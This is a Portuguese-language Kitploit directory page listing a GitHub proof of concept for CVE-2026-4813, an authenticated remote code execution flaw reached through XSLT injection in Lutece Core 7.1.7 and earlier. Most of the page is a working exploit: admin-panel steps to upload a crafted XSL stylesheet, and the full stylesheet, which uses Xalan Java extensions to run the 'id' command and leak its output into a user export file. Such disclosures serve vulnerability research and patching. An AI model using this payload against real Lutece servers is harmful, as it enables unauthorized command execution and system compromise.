Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-4813 — Prova de conceito de exploração para execução remota de código autenticada via injeção de XSLT no Lutece Core, demonstrando execução de comandos por meio de folhas de estilo XSL elaboradas. | Kitploit
Ferramentas/GitHubGitHub/trachinus/cve-2026-4813
Análise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubtrachinus/cve-2026-4813

CVE-2026-4813

Prova de conceito de exploração para execução remota de código autenticada via injeção de XSLT no Lutece Core, demonstrando execução de comandos por meio de folhas de estilo XSL elaboradas.

Ver Repositório
há 1 diaAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-4813 (CVSS-B 9.4 CRÍTICO)

RCE autenticado via injeção de XSLT no Lutece Core <= 7.1.7

> Explicações e mais informações no meu site <

PoC

Você precisa de uma conta com privilégios de administrador.

  1. No painel administrativo, navegue até a página de gerenciamento de exportação XSL: /jsp/admin/AdminTechnicalMenu.jsp?tab=xslexportManagement#xslexport

  2. Clique em "Adicionar uma nova folha de transformação".

  3. Carregue um arquivo .xsl com o payload (comando simples id):

root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0" 
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime"
    xmlns:proc="http://xml.apache.org/xalan/java/java.lang.Process"
    xmlns:is="http://xml.apache.org/xalan/java/java.io.InputStreamReader"
    xmlns:br="http://xml.apache.org/xalan/java/java.io.BufferedReader">
    
    <xsl:template match="/">
        <xsl:variable name="process" select="rt:exec(rt:getRuntime(), 'id')"/>
        <xsl:variable name="inputStream" select="proc:getInputStream($process)"/>
        
        <xsl:variable name="reader" select="is:new($inputStream)"/>
        <xsl:variable name="buffereReader" select="br:new($reader)"/>
        <xsl:variable name="resultat" select="br:readLine($buffereReader)"/>
        
        <Output>
            <xsl:value-of select="$resultat"/>
        </Output>
    </xsl:template>
</xsl:stylesheet>
  1. Salve a nova folha XSL.

  2. Navegue até a página de exportação de usuários: /jsp/admin/user/ExportUsers.jsp

  3. Selecione a folha de transformação que acabamos de criar e valide.

  4. O resultado do comando id deve estar no arquivo exportado.

Baixar ferramenta